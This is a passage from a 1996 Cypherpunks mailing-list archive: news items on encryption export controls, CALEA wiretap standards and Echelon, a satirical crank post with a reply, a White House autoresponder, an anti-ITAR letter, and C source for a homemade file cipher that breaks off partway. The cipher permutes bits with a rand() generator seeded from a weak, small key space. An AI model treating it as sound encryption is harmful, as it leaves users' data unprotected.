 most damning information details a global computer network, run by NSA
 on behalf of all the U.K./U.S. Treaty allies, called the Echelon/
 Dictionary network. Echelon allows NSA to snare traffic intercepted by
 any ally into a unified database, without the ally having the
 slightest idea of what NSA is taking. And Hager is certain that
 civilian telex and Internet traffic is a prime target of the system.

 Don't look for a U.S. distributor for Secret Power-everyone here is
 afraid to touch it. His publisher doesn't even list a phone or
 e-mail. But if we all write to Craig Potton Publishers, Box 555,
 Nelson, New Zealand, perhaps we can free up enough copies of the book
 to scare the U.S.  signal-intelligence community into having a minimum
 modicum of respect for civil liberties. But then again, I doubt it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Tue, 29 Oct 1996 23:49:38 -0800 (PST)
To: chromatic@chromatic.com
Subject: News: Sony/Philips has trouble exporting TV's
Message-ID: <199610300748.XAA29976@krypton.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


They're just TV's, for crying out loud!!

C-Cube patrons may remember Tom Lookabaugh (Christie Cadwell's
husband) who is quoted below.  I don't recall his title being "sales
manager", though, unless he got a recent "promotion" (frequently a
C-Cube management speak for "pushed aside").

Ern

--------

    From Electronic Buyers' News:

    October 28, 1996
    Issue: 1030
    Section: News

    CODE LIMIT EXCEEDED

    By Jack Robertson

    Washington - New Internet-television systems from Sony Corp. and
    Philips Electronics Co. are technically munitions under U.S. export
    controls and cannot be shipped to the companies' worldwide sales
    networks, it was disclosed last week.

    Sony officials said the company's TV set-top box designed by WebTV of
    Palo Alto, Calif., includes a state-of-the-art 128-bit code encryption
    system for electronic commerce. This far exceeds the 40-bit encryption
    code permissible for export under the U.S. Munitions Control List.

    Philips also makes a WebTV set-top Internet box at its Magnavox TV
    plant in Knoxville, Tenn., and is similarly barred from shipping the
    unit to sales channels around the world.

    Both global electronic giants face immediate competition in the
    emerging TV-Internet surfing market from other Japanese, South Korean,
    and European set-makers that don't face the U.S. encryption
    controls. They now join the U.S. computer industry, which has long
    protested that the outmoded encryption export curbs are causing them
    to forfeit overseas sales of PCs and workstations to foreign rivals.

    President Clinton last month proposed lifting the level of encryption
    export controls from the present 40-bit code word to 56 bits, but only
    if a trap door is embedded in the cipher to allow law enforcement
    agencies to decode wiretapped messages. Clinton is expected shortly to
    sign an executive order putting the new control limits into effect.

    The pending 56-bit-code threshold doesn't help the Sony or Philips
    Web-surfing TV systems - nor most U.S. computer companies that build
    systems with encryption exceeding even the new control limit. Both
    Netscape and Microsoft Web-browsing software includes 128-bit code
    encryption, surpassing export curbs.

    Zenith Electronics Co., maker of a Web-surfing TV set, isn't concerned
    about the encryption controls, since it sells only in the U.S. market
    where the curbs don't apply.

    Divicom Inc., based in Milpitas, Calif., must get an export license
    from the U.S. State Department for every exported cable TV front-end
    encoder, which includes 128-bit code word, according to Tom
    Lookabough, the company's sales manager. He said the license review
    process can take eight weeks or more, a troublesome delay that foreign
    competitors don't face.

    Divicom and Scientific Atlanta both said their new digital TV set-top
    boxes include encryption that exceeds allowable export limits - but
    virtually all sales so far are in the U.S. market. As digital-box
    production ramps up, the companies would like to sell overseas, but
    run into the export control ban that puts them at a severe
    disadvantage against the foreign competitors aggressively entering the
    set-top market.

    President Clinton's encryption export control changes include an
    industry-favored provision to take the category off the State
    Department's Munitions Control List and shift responsibility to the
    Commerce Department.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 30 Oct 1996 00:06:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: News: TIA to
Message-ID: <199610300805.AAA00355@krypton.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


    From Communications Week

    October 28, 1996
    Issue: 635
    Section: Telepath -- Top Sories


    TIA TO ISSUE DRAFT WIRETAP SPECS

    By Peter Cassidy

    The Telecommunications Industries Association next month will issue
    draft standards allowing manufacturers to make equipment that complies
    with the most recent federal wiretapping law.

    If and when those draft standards are ultimately approved, however,
    equipment makers will still face a troubling dilemma: The U.S. Justice
    Department, which in large part wrote the new law, is also the agency
    that will enforce it.

    President Clinton signed the Communications Assistance for Law
    Enforcement Act in October 1994 after a last-ditch, sub-rosa lobbying
    effort by the National Security Agency and the Federal Bureau of
    Investigation pushed the bill through a Senate committee.

    In essence, the law says that the U.S. Attorney General will dictate
    how the law will carry out its job of tapping into switches.

    As of October 1998, manufacturers will have to build their switches to
    meet the industry specs, and carriers will have to maintain the
    switches accordingly.

    Switches in place before Jan. 1, 1995, are nominally exempted from
    compliance. Modifications intended to fulfill the capabilities the
    Justice Department mandates will be required only if companies are
    reimbursed for the changes-the exception being equipment that has been
    "substantially" modified.

    Despite these protections, concern persists: Because many of the
    technical features in place before the January 1995 cutoff will have
    been updated in some way, conflicts with the Justice Department may
    ensue over whether to consider them "pre-existing" technologies under
    the law.

    And companies on the losing end will suffer major penalties: The law
    specifies that the FBI can define which companies are not in
    compliance and bring civil actions against them, with fines of up to
    $10,000 per violation.

    Accordingly, the ambiguity in the legislative language could end up as
    costly both for modifications that are not reimbursed and for court
    challenges.

    "What is not really addressed is what 'a significant upgrade' really
    means," said Dan Bart, standards and technology vice president at the
    TIA. "Ultimately, some test case will come and some judge will make
    the final decision."

    Given the relationship between the industry and Justice over
    wiretapping capability thus far, a court challenge hardly seems
    far-fetched. In fact the act was proposed only after the FBI and
    telecom industry groups wrangled for years in consultative
    committees. The FBI had argued that advanced telephony technologies
    were making it difficult to wiretap and capture call data. Finally,
    the agency turned to a legislative solution.

    The TIA's draft standards, due to be issued next month by the group's
    TR 45.2 committee, will contain the technical specifications required
    to build-in the features for the Electronic Surveillance Interface
    that the act defines.

    Following a comment period of up to 90 days, the standards will be
    placed on a ballot for a vote by committee members, said committee
    chairwoman Cheryl Blum. If substantial changes are made to the draft
    during the comment period, the standards may have to go back to the
    committee, she noted.

    Cellular data removed

    At a standards meeting last month, the committee removed language that
    would have defined a standard for forwarding the location data of
    cellular phones when the instrument is powered up-but not actively
    transmitting and receiving-information the FBI indicated it should
    have if available.

    Ms. Blum said the committee decided such a capability exceeds the
    requirements of the the act. This point is important because, under
    the law, companies are reimbursed only for those modifications of
    existing technologies expressly spelled out in the act.

    Clearly, the FBI holds the whip, even in this standards-making
    process. Should the standards be found deficient under the law, the
    FCC can step in and replace those standards with its own.

    Justice is the most visible proponent, but the act is also of great
    interest to the NSA, which introduces a potentially troubling level of
    complexity as the industry attempts to comply with the law.

    Commerce Department memos obtained by Telepath show that the NSA was
    involved in sculpting the language of the act as far back as 1992.

    A Senate committee staff attorney, now in private industry, told
    Telepath that the NSA's interest was that the act introduce the
    opportunity to build wiretap access points into switches outside the
    United States.

    Equipment built to specifications in this country-and by offshore
    manufacturers for the U.S.  market-would thus find its way into
    foreign telephone networks, allowing the NSA a simpler means to tap
    into targeted subjects.

    What liabilities this introduces to equipment makers remains unclear,
    as these are the early days of the act-the first law to give the
    government the power to demand design changes in telephony
    technologies.

    Peter Cassidy is a freelance writer. Send your reactions to this
    article to telepath@cmp.com.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. Patrick Elam, III" <patelam3@mindspring.com>
Date: Tue, 29 Oct 1996 21:27:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Montgolfiering, the Hot Air Balloon of Cryptography
Message-ID: <1.5.4.16.19961030053221.24bf8768@pop.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


To nobody@replay.com (Anonymous):

I will use simple words so you can understand.

My IQ is not 207 but I know BS when I see it.  Too much bravado without
substance.  Too much hot air without mass.  You claim that thermodynamics is
about hot air.  Anyone with a basic course in physics knows that
thermodynamics is not just about hot air.

Present the algorithm and it's proof if you want someone to listen or stop
wasting everyones time with your rantings.

Pat

At 10:17 PM 10/29/96 +0100, nobody@replay.com (Anonymous), wrote:
>
>Fie on the small minds that cackle at my brilliance! As a Mensa member and
>founder of the Society for Superintelligent Former NSA Employees, I chortle
>at the baseness of callow criticisms by those doubters and dilletantous
>denigrators of virtual one-time pads and PRNGs (perfect random number
>generators).
>
>Montgolfiering. What is it, you ask? It is demonstrably a new paradigm in
>the evolution of homo sapiens (Parry Messger excepted) toward Shannon's
>dream of a one-time pad needing only a single, easily memorizable number as
>a seed. I have heard only silence when I challenged the so-called
>superbrains of this latargial list to try to determine which number I am
>using as the seed of my system. If you are such great smarty pants, far
>smarter than my colleagues at the NSA and at Mauchly-Wood, why can you not
>then determine this number? Could it be because I have outsmarted you?
>Could it be because I understand the Sufi secrets of picking random numbers
>truly randomly? I submit this to you: 8  31  26  3  19. Now, oh great ones,
>tell me, what is the next number in this sequence?
>
>Ha, you cannot predict this next number, can you, oh gibbering greatnesses?
>Ths proves that my perfect random number genarator (PRNG, for those of you
>too stupid to remember) cannot be broken. Q.E.D.
>
>I question the issue of Parry Messger's objectivity in assessing the
>brilliance of my importations and acidulous assertations. I question
>whether Parry may have a peculiarly pecuniary interest in these affairs?
>Does Parry have an insider, or other position, or interest in one or more
>of the RSA interest? If, this explains his fantastical faith in the core of
>this so-called "RSA" system, which I proved to my colleagues at NSA could
>not possibly be valid. Why, you ask? Because it contains no virtual seed,
>and that which has no seed cannot grow. Q.E.D.--it has been debunked.
>
>Entropy, you quibble? Ha! What is entropy but thermodynamics? And what is
>the topic of thermodynamics, you small-minded ensemble (Gibbs) people who
>never worked for the NSA may ask? Thermodynamics is about hot air. Hot air
>is in balloons. Balloons were pioneered by the Montgolfiers. Thus we come
>full circle (can you understand this, you mental midgets?).  Q.E.D.--it has
>been demystified.
>
>Montgolfiering = a new virtual one time pad based on hot air. Eureka! I
>have found it.
>
>P Information = P * log_base_infinity P
>
>As my colleague Dr. Bronner told me on my last balloon trip to his
>institute in Escondido, "NATURAL! NATURAL! NATURAL! YOU AND THE PLANET -
>CLEAN AND HEALTHY! PURE AND NATURAL CRYPTO COMES FROM WITHIN THE AGENCY."
>
>I pity your eupatrid minds for not accepting the wisdom of the Virtual
>Montgolfiering System (which I have dubbed "VMS"). I guess unintelligent
>creatures such as petty selves are too much like Parry Messger! Your
>mendacious misrepresentations of my brilliance are wounding me deeply--NOT!
>
>Only Dr. Bronner and Dr. Vulis seem capable of understanding the immmense
>mental breakthrough my IQ measured at 207 has provided the world.
>
>I laugh at your sanctimonious snivelings, your bombastic bombardings, and
>your fatuous flatulations.
>
>Remember, they laughed at Galileo. They laughed at Bozo. They laughed at
>Von Daniken. They laughed at Ludwig Plutonium! All of those who leaped at
>the opportunity to take me apart before are now displaying contemptuous
>intellectual pap, that is pap not the other similar word though that also
>applies. Their misleading inculcations did not work so what are they trying
>now. 
>
>Montgolfiering into the hot air, I am,
>
>--KVFP, Esquire, KOTM
>
>(Montgolfiering. Q.E.D.--"it has been deflated")
>
-----BEGIN PGP SIGNED MESSAGE-----

 -------------------------------------------------------
Patrick Elam
patelam3@atl.mindspring.com    Engineering at its finest!
http://www.mindspring.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfwmggBXLW8oj+lZAQHCiwP+La/CLNY/yRvrH8TZQdvTxHK7Dgf0e1Dp
j1xsa0h4VoWXrM4v5LYHbjyFYcpJGpOY7s6yIl1vFj2HGaix6DTv222/dHleMZZp
lUJtAoJAW7AmbwA51skDc5EZZ0oSBh2BRXUfuAEzicm709SmKUKn0oH0vtKoS4Z2
xaGZ7952BX8=
=MM2Y
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 29 Oct 1996 21:55:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: nytsnoop
Message-ID: <1.5.4.32.19961030055424.0068f948@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


News: By far the top snoop at jya.com:

gatekeeper.nytimes.com

Extra surprise: the site's logging 13,000 hits per month, mostly 
crypto-related.

Odd, jya.com knows squat about such hot rods.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 30 Oct 1996 01:05:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: When did Mondex ever claim to be anonymous?
Message-ID: <1.5.4.32.19961030090327.00397f24@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>> I don't think spreading false rumours is a good idea - it can discredit
>>> the spreader if anyone bothers to check any details.

>>Disinformation is a time-honoured weapon in political struggle.

Foo.  There's so much totally outrageous stuff the government _does_
that we don't have to go giving them ideas about _more_ things to do.

And ethics aside (:-), bogus rumours get you lumped in with the folks who
think Space Aliens fired that shot from the Grassy Knoll in a plot
to kidnap Elvis.  It's hard enough not to get treated like that
when you're telling the truth, especially about issues where the
government knows it's cheating.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: autoresponder@WhiteHouse.gov
Date: Tue, 29 Oct 1996 23:40:09 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: ITAR / S 1726 / Civil Disobedience
Message-ID: <199610300739.CAA12884@WhiteHouse.gov>
MIME-Version: 1.0
Content-Type: text/plain


    Thank you for writing to President Clinton via electronic
mail.  Since June, 1993, whitehouse.gov has received over one
million messages from people across the country and around the
world.  

    Because so many of you write, the President cannot
personally review each message.  The mail is first read by White
House Correspondence staff.  Your concerns, ideas, and
suggestions are carefully recorded and communicated to the
President weekly with a representative sampling of the mail.

     We are excited about the progress of online communication as
a tool to bring government and the people closer together.  Your
continued interest and participation are very important to that
goal.

                       Sincerely,

                       Stephen K. Horn
                       Director, Presidential Email
                       The Office of Correspondence

P.S. Please read on - you may find the following information
useful.

--  This is the only electronic message you will receive from
whitehouse.gov.  No other message purporting to be from the
President or his staff with an address at whitehouse.gov is
authentic.  If you have received such a message, you have been
spoofed.

--  You will receive only one autoresponder message per day.

--  The only personal addresses at whitehouse.gov are the
following:

    President@whitehouse.gov
    Vice.President@whitehouse.gov
    First.Lady@whitehouse.gov

Please write to Mrs. Gore and other White House staff by regular
mail.  The address is:  

     The White House, Washington, D.C. 20500.

--   On October 20, 1994, President Clinton and Vice President
Gore opened a World Wide Web home page called "Welcome to the
White House:  An Interactive Citizens' Handbook" and it remains
one of the more popular spots on the Web.  The White House
home page provides, among other things,  a single point of access
to all government information available electronically on the
Internet.  "Welcome to the White House" can be accessed at:

               http://www.whitehouse.gov

--   White House documents and publications are available on the
World Wide Web (see above) and by email.  To receive instructions
on retrieving documents by email, please send a message to the
following address:

               publications@whitehouse.gov

In the body of your message, type "Send Info" (without quotes);
do not include other text (such as message headers or
signature lines (.sig files)).  The instructions will be sent to
you automatically.

****************************************************************
List of Clinton Administration Accomplishments (three documents
compose the whole):

    To:  publications@whitehouse.gov
    Message body:      send file 317571
                       send file 317573
                       send file 317575
****************************************************************

--   The White House Public Access Email FAQ (Frequently Asked
Questions) document is available at the following address.  The
FAQ, among other things, lists alternate sources of government
information, i.e., the Congressional email projects.  Send an
email message (no text necessary) to:

               faq@whitehouse.gov

(This FAQ address is an autoresponder only; any comment sent to
this address will not be acknowledged.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cypherpunks <cypherpunks@toad.com>
Date: Tue, 29 Oct 1996 23:37:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: ITAR / S 1726 / Civil Disobedience
Message-ID: <m0vIVEv-0002nhC@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain



Dear Mr. President,

   I am writing to express my disapproval of the Clinton Administration's
position on the ITAR restrictions for encryption software.  This is an
important issue to me.

  1) Software is writing, so it is protected by the first amendment, 
     so the ITAR is unconstitutional.  The idea that only paper books
     are first amendment protected, and electronic books are not, is just 
     plain wrong.

  2) The ITAR does not help National Security, but in fact greatly reduces 
     our nations security because the Internet, and the computers and 
     information connected to it, are kept from using good Encryption.  

  3) I feel that encryption is very important for doing commerce on the 
     Internet, and that commerce on the Internet is important for our 
     economy (Internet is the fastest growing sizable segment).  You say 
     you like the "Information Super Highway" and you are "going to focus 
     on the economy like a laser".  You should be removing the ITAR 
     restrictions on American businesses.  Otherwise the business for 
     commerce software will go to companies in other countries.

  4) The Clinton Clipper III proposal to have government key escrow 
     is not acceptable.  Also, it will never work, since people will 
     always be able to buy and use software from the rest of the world.  
     This proposal is just slowing down Internet progress.  Please
     cancel Clipper III.

  4) I really don't want to vote for a president who would continue this
     type of regulation of the Internet.  The Republican candidate
     Bob Dole and the Libertarian candidate Harry Browne support 
     Senator Burns Pro-CODE bill S 1726 that would end this foolishness.  

     The current law, (see http://www.law.cornell.edu/uscode/22/2778.html),
     says that "The President shall periodically review the items on 
     the United States Munitions List to determine what items, if any, 
     no longer warrant export controls under this section.  The results 
     of such reviews shall be reported to the Speaker of the House [...] 
     at least 30 days before any item is removed from the Munitions 
     List [...]."  

     It seems either of your two rivals would, if president, end the
     control of software.  Will we have to elect one of them president 
     to remove software from the Munitions list?

  5) As an act of civil disobedience I have personally exported an 
     encryption program (it is 3 lines of writing) using the web page at 
     http://online.offshore.com.ai/arms-trafficker/

Yours sincerely,


     Cypherpunks
     cypherpunks@toad.com

Sent from host niobe.c2.net with IP 140.174.185.17 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 30 Oct 1996 07:01:35 -0800 (PST)
To: coderpunks@toad.com
Subject: [CRYPTO] Cryptography Of A Sort (COAS) update
Message-ID: <32776CB4.673A@gte.net>
MIME-Version: 1.0
Content-Type: text/plain

[note: last post didn't have attachment]

Per suggestions received for this project, I've added code to "pad" 8th bits in a
"7-bit" text file, i.e., to "normalize" the ratio of zero-bits and one-bits somewhat.

Bit-padding prior to encryption does not change the central imperative of the program,
which is to never change any bits in a file, since bit-padding is a separate option.

Attached are:  CCRP.H   ('C'-language header)
               CCRP.C   ('C'-language code)
               CCRP.DOC (instructions)
               CCRP.FAQ (f.a.q.)

Suggested procedure:  Start with any file; if "7-bit" ASCII, try bit-padding first.
                      Next, perform encryption at least half a dozen times, with
                      different pass-phrases.
                      To decrypt, perform all steps in reverse, per documentation.

Comments and questions are welcome.


/* CCRP.H  28.10.1996 */

typedef char     C;                       /* char (strings, null-terminated) */
typedef double   D;                       /* double float (double precision) */
typedef float    F;                              /* float (single precision) */
typedef int      I;                                /* short integer (signed) */
typedef long     L;                                 /* long integer (signed) */
typedef unsigned int U;                          /* short integer (unsigned) */
typedef unsigned char UC;                              /* unsigned character */
typedef void     V;                                        /* void data type */

I bitget(C *cstr, I ibit);
V bitput(C *cstr, I ibit, I iput);
V ifn_cryp(I *int1, I *int2, I *istk, C *cbuf, C *ctmp, I ibit, I ilen, I iopr);
V ifn_msgs(C *cmsg, I iofs, I irow, I icol, I ibrp, I iext);
V ifn_pack(C *cbuf, L llof, U ibuf, I iopr, struct _iobuf *ebuf);
V ifn_read(C *cbuf, L lbyt, U ibuf, struct _iobuf *ebuf);
V ifn_sort(I *int1, I *int2, I *istk, I imax);
V ifn_write(C *cbuf, L lbyt, U ibuf, struct _iobuf *ebuf);
U io_vadr(I inop);
V io_vcls(I iclr);
V io_vcsr(I irow, I icol, I icsr);
V io_vdsp(C *cdat, I irow, I icol, I iclr);

union REGS rg;                          /* DOS registers declaration (video) */
U _far *uvadr = 0;                                  /* video display pointer */
*******************************************************************************
*******************************************************************************
*******************************************************************************
/* CCRP.C  Encrypt/Decrypt a DOS file */
/*         By: Dale Thorn             */
/*         Version 3.1                */
/*         Rev. 29.10.1996            */

#include "stdlib.h"
#include "string.h"
#include "stdio.h"
#include "dos.h"
#include "io.h"
#include "ccrp.h"

V main(I argc, C **argv) {     /* command-line arguments (input file/offset) */
   C cmsg[23];                         /* initialize the User message string */
   U ibit = 0;                          /* initialize the bit offset in cbuf */
   U ibuf = 2048;                          /* set maximum file buffer length */
   U idot;                    /* initialize the filename extension separator */
   I ieof = 0;                                    /* initialize the EOF flag */
   U ilen;                         /* initialize a temporary length variable */
   U indx;                           /* initialize a temporary loop variable */
   I iopr;                                  /* initialize the operation code */
   U irnd = 0;                             /* initialize the randomizer seed */
   L lbyt;                           /* initialize the file pointer variable */
   L llof;                            /* initialize the file length variable */
   L lrnd = 0;                      /* initialize the randomizer accumulator */
   U _far *uvadr = 0;                               /* video display pointer */
   struct _iobuf *ebuf;                      /* source file access structure */

   C *cbuf = (C *)malloc(2048);                /* initialize the file buffer */
   C *ctmp = (C *)malloc(2048);                /* initialize the temp buffer */
   I *int1 = (I *)malloc(3074);             /* allocate the sort index array */
   I *int2 = (I *)malloc(3074);     /* allocate the sort random number array */
   I *istk = (I *)malloc(3074);             /* allocate the sort stack array */

   if (argc == 1) {                       /* a command line was not supplied */
      ifn_msgs("Usage:  CCRP(v3.1)  filename  [/e /d /p /u]  [key]",\
               4, 24, 79, 0, 1);   /* display usage message [above] and exit */
   }
   if (argc < 3 || argc > 4) {     /* no. of parameters should be one or two */
      ifn_msgs("Invalid number of parameters", 4, 24, 79, 1, 1);
   }                   /* display no.-of-parameters message [above] and exit */
   if (argv[2][0] != '/') {             /* slash preceding parameter missing */
      ifn_msgs("Invalid operation parameter", 4, 24, 79, 1, 1);
   }                   /* display invalid-parameter message [above] and exit */
   strupr(argv[1]);                                /* uppercase the filename */
   strupr(argv[2]);                          /* uppercase the operation code */
   if (strchr("DEPU", argv[2][1]) == NULL) {            /* invalid parameter */
      ifn_msgs("Invalid operation parameter", 4, 24, 79, 1, 1);
   }                   /* display invalid-parameter message [above] and exit */
   idot = strcspn(argv[1], "."); /* position of filename extension separator */
   ilen = strlen(argv[1]);                             /* length of filename */
   if (idot == 0 || idot > 8 || ilen - idot > 4) {     /* filename tests bad */
      ifn_msgs("Invalid filename", 4, 24, 79, 1, 1);
   }                    /* display invalid-filename message [above] and exit */
   if (idot < ilen) {                 /* filename extension separator found! */
      if (strcspn(argv[1] + idot + 1, ".") < ilen - idot - 1) {/* 2nd found! */
         ifn_msgs("Invalid filename", 4, 24, 79, 1, 1);
      }                 /* display invalid-filename message [above] and exit */
   }
   strcpy(cmsg, argv[1]);                        /* copy filename to message */
   strcat(cmsg, " not found");                 /* add "not found" to message */
   ebuf = fopen(argv[1], "rb+");                   /* open the selected file */
   llof = filelength(fileno(ebuf));           /* filelength of selected file */
   if (ebuf == NULL || llof == -1L || llof == 0) {/* length=0 or call failed */
      fclose(ebuf);                                        /* close the file */
      remove(argv[1]);                          /* kill the zero-length file */
      ifn_msgs(cmsg, 4, 24, 79, 1, 1);           /* display message and exit */
   }
   iopr = argv[2][1] - 68;     /* opcode (1=encrypt, 0=decrypt, 12=pad bits) */
   if (argc == 4) {                               /* a seed key was supplied */
      ilen = strlen(argv[3]);                 /* length of optional seed key */
      for (indx = 0; indx < ilen; indx++) {     /* loop through the seed key */
         irnd = argv[3][indx];                 /* character at byte position */
         switch (indx % 3) {                  /* select on byte significance */
            case 0:                                /* least significant byte */
               lrnd += irnd;                     /* add to randomizer accum. */
               break;
            case 1:                            /* 2nd least significant byte */
               lrnd += (L)irnd * 256;            /* add to randomizer accum. */
               break;
            case 2:                                 /* most significant byte */
               lrnd += (L)irnd * 65536;          /* add to randomizer accum. */
               break;
            default:
               break;
         }
      }
      irnd = (U)(lrnd % 32640) + 1;       /* mod randomizer seed to <= 32640 */
   }
   ifn_msgs("Please standby", 4, 24, 79, 0, 0);           /* standby message */

   if (iopr > 1) {                           /* operation code is 'P' or 'U' */
      ifn_pack(cbuf, llof, ibuf, iopr, ebuf);  /* add 8th bits if 7-bit file */
   }                                  /* NOTE: ifn_pack does NOT return here */
   srand(irnd);                    /* initialize the random number generator */
   for (lbyt = 0; lbyt < llof; lbyt += ibuf) {   /* process in ibuf segments */
      if (lbyt + ibuf >= llof) {    /* current file pointer + ibuf spans EOF */
         ibuf = (U)(llof - lbyt);        /* reset maximum file buffer length */
         ieof = 1;                                    /* set the EOF flag ON */
      }
      ifn_read(cbuf, lbyt, ibuf, ebuf);    /* read data into the file buffer */
      while (1) {                      /* loop to process bit groups in cbuf */
         ilen = (rand() / 26) + 256;/* buffer seg. bit-len.: 256<=ilen<=1536 */
         if (ibit + ilen > ibuf * 8) {/* current bit-pointer+ilen spans cbuf */
            if (ieof) {                                    /* EOF flag is ON */
               ilen = ibuf * 8 - ibit; /* reset bit-length of buffer segment */
            } else {                 /* EOF flag is OFF; adjust file pointer */
               ifn_write(cbuf, lbyt, ibuf, ebuf);  /* write data to the file */
               lbyt -= (ibuf - ibit / 8);/* set file ptr to reload from ibit */
               ibit %= 8;            /* set ibit to first byte of <new> cbuf */
               break;                  /* exit loop to reload cbuf from lbyt */
            }
         }                 /* encrypt or decrypt the current segment [below] */
         ifn_cryp(int1, int2, istk, cbuf, ctmp, (I)ibit, ilen, iopr);
         ibit += ilen;                 /* increment ibit to next bit-segment */
         if (ibit == ibuf * 8) {        /* loop until ibit == length of cbuf */
            ifn_write(cbuf, lbyt, ibuf, ebuf);     /* write data to the file */
            ibit = 0;                /* set ibit to first byte of <new> cbuf */
            break;
         }
      }
   }
   ifn_msgs("Translation complete", 4, 24, 79, 0, 1);/* disp. message & exit */
}

I bitget(C *cstr, I ibit) {                 /* get a bit-value from a string */
   I ival;                                       /* initialize the bit value */

   switch (ibit % 8) {                    /* switch on bit# within character */
      case 0:                                  /* bit #0 in target character */
         ival = 1;                                        /* value of bit #0 */
         break;
      case 1:                                  /* bit #1 in target character */
         ival = 2;                                        /* value of bit #1 */
         break;
      case 2:                                  /* bit #2 in target character */
         ival = 4;                                        /* value of bit #2 */
         break;
      case 3:                                  /* bit #3 in target character */
         ival = 8;                                        /* value of bit #3 */
         break;
      case 4:                                  /* bit #4 in target character */
         ival = 16;                                       /* value of bit #4 */
         break;
      case 5:                                  /* bit #5 in target character */
         ival = 32;                                       /* value of bit #5 */
         break;
      case 6:                                  /* bit #6 in target character */
         ival = 64;                                       /* value of bit #6 */
         break;
      case 7:                                  /* bit #7 in target character */
         ival = 128;                                      /* value of bit #7 */
         break;
      default:
         break;
   }
   return ((cstr[ibit / 8] & ival) != 0);      /* return value of target bit */
}

V bitput(C *cstr, I ibit, I iput) {           /* put a bit-value to a string */
   I ival;                                       /* initialize the bit value */
   I ipos = ibit / 8;                     /* position of 8-bit char. in cstr */

   switch (ibit % 8) {                    /* switch on bit# within character */
      case 0:                                  /* bit #0 in target character */
         ival = 1;                                        /* value of bit #0 */
         break;
      case 1:                                  /* bit #1 in target character */
         ival = 2;                                        /* value of bit #1 */
         break;
      case 2:                                  /* bit #2 in target character */
         ival = 4;                                        /* value of bit #2 */
         break;
      case 3:                                  /* bit #3 in target character */
         ival = 8;                                        /* value of bit #3 */
         break;
      case 4:                                  /* bit #4 in target character */
         ival = 16;                                       /* value of bit #4 */
         break;
      case 5:                                  /* bit #5 in target character */
         ival = 32;                                       /* value of bit #5 */
         break;
      case 6:                                  /* bit #6 in target character */
         ival = 64;                                       /* value of bit #6 */
         break;
      case 7:                                  /* bit #7 in target character */
         ival = 128;                                      /* value of bit #7 */
         break;
      default:
         break;
   }
   if (iput) {                                       /* OK to set the bit ON */
      if (!(cstr[ipos] & ival)) {                   /* bit is NOT already ON */
         cstr[ipos] += ival;                    /* set bit ON by adding ival */
      }
   } else {                                         /* OK to set the bit OFF */
      if (cstr[ipos] & ival) {                     /* bit is NOT already OFF */
         cstr[ipos] -= ival;                    /* set bit OFF by subt. ival */
      }
   }
}

V ifn_cryp(I *int1, I *int2, I *istk, C *cbuf, C *ctmp, I ibit, I ilen, I iopr) {
   I indx;                           /* initialize the for-next loop counter */

   for (indx = 0; indx < ilen; indx++) { /* loop through ilen array elements */
      int1[indx] = indx;             /* bit offsets from current ibit offset */
      int2[indx] = rand();         /* random number values for sort function */
   }
   ifn_sort(int1, int2, istk, ilen - 1);    /* Quicksort by random no. array */
   memcpy(ctmp, cbuf, 2048);  /* copy data buffer to temp destination buffer */
   if (iopr) {                                          /* encrypt operation */
      for (indx = 0; indx < ilen; indx++) { /* loop thru ilen array elements */
         bitput(ctmp, indx + ibit, bitget(cbuf, int1[indx] + ibit));/*encrypt*/
      }
   } else {                                             /* decrypt operation */
      for (indx = 0; indx < ilen; indx++) { /* loop thru ilen array elements */
         bitput(ctmp, int1[indx] + ibit, bitget(cbuf, indx + ibit));/*decrypt*/
      }
   }
   memcpy(cbuf, ctmp, 2048);  /* copy temp destination buffer to data buffer */
}

V ifn_msgs(C *cmsg, I iofs, I irow, I icol, I ibrp, I iext) {/* display msgs */
   io_vcls(7);                                           /* clear the screen */
   io_vdsp(cmsg, 4, iofs, 7);                    /* display the user message */
   if (ibrp) {                              /* OK to sound user-alert (beep) */
      printf("\a");                                  /* sound the user-alert */
   }
   if (iext) {                                     /* OK to exit the program */
      io_vcsr(5, 0, 0);                               /* relocate the cursor */
      fcloseall();                                   /* close all open files */
      exit(0);                                              /* return to DOS */
   } else {                                       /* do NOT exit the program */
      io_vcsr(irow, icol, 0);                           /* 'hide' the cursor */
   }
}

V ifn_pack(C *cbuf, L llof, U ibuf, I iopr, struct _iobuf *ebuf) {
   I ibit;                           /* initialize a temporary loop variable */
   U ichr;                           /* initialize a temporary loop variable */
   U incr;                          /* initialize the bit-pad loop increment */
   U itmp = ibuf;                   /* make a copy of the file buffer length */
   L lbyt;                           /* initialize the file pointer variable */
   L lcnt = 0;                      /* initialize the current total one-bits */
   L ltmp;                    /* initialize a copy of current total one-bits */
   L ltot;                       /* initialize the no. of 8th bits to set ON */

   for (lbyt = 0; lbyt < llof; lbyt += itmp) {   /* process in itmp segments */
